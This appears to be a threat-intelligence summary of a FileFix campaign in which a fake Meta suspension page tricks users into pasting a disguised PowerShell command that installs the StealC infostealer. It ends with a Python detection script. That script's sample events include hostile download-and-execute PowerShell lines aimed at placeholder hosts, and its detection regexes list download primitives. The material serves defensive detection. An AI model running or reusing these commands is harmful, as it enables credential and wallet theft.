FileFix Meta account-suspension phishing campaign
Campaign
Summary
The attackers behind this FileFix campaign use a Meta account-suspension lure to trick users into running a disguised command that installs the StealC infostealer. The phishing page's Copy button places a PowerShell command on the clipboard, padded so that only a fake file path is visible once it is pasted into the File Explorer address bar; the command fetches a JPG hosted on Bitbucket and uses steganography to unpack the next stage. The operation was seen in multiple variants over two weeks, showing active iteration across payloads, domains, and lures. It matters because StealC can take browser logins, cloud credentials, cryptocurrency wallets, and other sensitive data from infected devices.
Related Happenings
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
Campaign
First: 20.04.2026 18:01
Last: 20.04.2026 18:01
Sources 1
About this happening:
The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Torg Grabber browser-extension theft activity
Malware Activity
First: 25.03.2026 20:32
Last: 25.03.2026 20:32
Sources 1
About this happening:
The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
Campaign
First: 11.03.2026 16:45
Last: 11.03.2026 16:45
Sources 1
About this happening:
A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware Activity
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
Timeline
16.09.2025 15:00 · 2 articles
FileFix Meta account-suspension lure drops StealC
Technical Analysis Update
A FileFix social-engineering campaign impersonates Meta account-suspension warnings with a multilingual phishing page that tells recipients their account will be disabled in seven days unless they open a fake "incident report". The page's Copy button places a PowerShell command on the clipboard instead of a file path; once the victim pastes it into the Windows File Explorer address bar and presses Enter, explorer.exe launches PowerShell, which downloads a JPG hosted on Bitbucket, extracts a second-stage script from it with steganography, decrypts further payloads in memory, and deploys the StealC infostealer to steal browser credentials, messaging-app logins, cryptocurrency wallets, cloud credentials, and screenshots.
Sources
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
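The execution chain in the analysis above (explorer.exe launching PowerShell from a padded clipboard string, then a script host pulling a JPG from Bitbucket) is what endpoint telemetry actually sees, so the check a responder wants is a triage rule over process-creation and network events. The following is an added example, not code from the page, from Acronis or from BleepingComputer. It assumes Sysmon-style fields (parent image, image, command line; image, host, URL path), assumes the FileFix padding takes the form of a whitespace run followed by an optional `#` comment and a Windows path, and uses constructed sample events whose bitbucket.org workspace and repository names are placeholders, not campaign indicators.

```python
"""Triage heuristics for the FileFix execution chain (added example).

Encodes two observations from the campaign write-up:
  1. the pasted string is a real PowerShell command, whitespace padding,
     then a fake file path, so the address bar shows only the path and
     explorer.exe becomes the parent of the resulting shell;
  2. the first stage fetches a JPG from bitbucket.org and unpacks the
     next stage from it.
All event values below are constructed; names are placeholders.
"""
import re
from dataclasses import dataclass

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
IMAGE_EXT = (".jpg", ".jpeg", ".png")

# Whitespace run, optional PowerShell comment marker, then a Windows path:
# the tail that is all the File Explorer address bar displays (assumed shape).
PADDED_PATH = re.compile(r"\s{8,}(?:#\s*)?[A-Za-z]:\\\S+")

# Download-and-execute primitives commonly found in pasted lure commands.
DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|Net\.WebClient|DownloadString|"
    r"DownloadFile|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


@dataclass
class NetEvent:
    image: str
    host: str
    url_path: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process(ev: ProcEvent) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one process-creation event.

    explorer.exe launching a shell is common (users open shells from the
    address bar or Run dialog), so alone it is only 'low'; the padding trick
    or a download primitive in the same command line raises it to 'high'.
    """
    from_explorer = basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in SHELLS
    padded = PADDED_PATH.search(ev.command_line) is not None
    downloads = DOWNLOAD.search(ev.command_line) is not None

    reasons = []
    if from_explorer:
        reasons.append("shell spawned directly by explorer.exe (address bar / Run dialog)")
    if padded:
        reasons.append("command line padded with whitespace to hide behind a fake file path")
    if downloads:
        reasons.append("download/execute primitive in command line")

    if from_explorer and (padded or downloads):
        severity = "high"
    elif padded or downloads:
        severity = "medium"
    elif from_explorer:
        severity = "low"
    else:
        severity = "none"
    return severity, reasons


def is_stego_staging(ev: NetEvent) -> bool:
    """True when a script host, not a browser, pulls an image from bitbucket.org."""
    return (
        basename(ev.image) in SHELLS
        and ev.host.lower().endswith("bitbucket.org")
        and ev.url_path.lower().endswith(IMAGE_EXT)
    )


# Constructed sample telemetry (placeholder hosts, paths and repository names).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
LURE_CMD = (
    r'powershell -w hidden -c "iwr https://bitbucket.org/example-ws/example-repo/downloads/cover.jpg'
    r' -OutFile $env:TEMP\cover.jpg; . $env:TEMP\stage.ps1"'
    + " " * 40
    + r"# C:\Users\Public\Downloads\incident_report.pdf"
)
SAMPLE_PROCS = [
    ProcEvent(EXPLORER, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", "alice"),
    ProcEvent(EXPLORER, PS, LURE_CMD, "alice"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
              "powershell -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"", "bob"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4", "SYSTEM"),
]
SAMPLE_NET = [
    NetEvent(PS, "bitbucket.org", "/example-ws/example-repo/downloads/cover.jpg"),
    NetEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "bitbucket.org", "/example-ws/example-repo/downloads/cover.jpg"),
    NetEvent(PS, "www.powershellgallery.com", "/api/v2/package/PSReadLine"),
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCS:
        sev, why = triage_process(ev)
        print(f"[{sev:6}] {basename(ev.parent_image)} -> {basename(ev.image)}: {'; '.join(why) or '-'}")
    for ev in SAMPLE_NET:
        print(f"[{'stego?' if is_stego_staging(ev) else 'ok'}] {basename(ev.image)} -> {ev.host}{ev.url_path}")
```

Two caveats for anyone turning this into a production rule: a ClickFix lure pasted into the Run dialog also shows up with explorer.exe as the parent, so the parent-child pair does not distinguish the two techniques and should never alert on its own; and the padding regex is tuned to the whitespace-plus-fake-path shape, so a variant that hides the command differently (the write-up notes active iteration across lures) will only be caught by the download-primitive or bitbucket.org image-fetch checks.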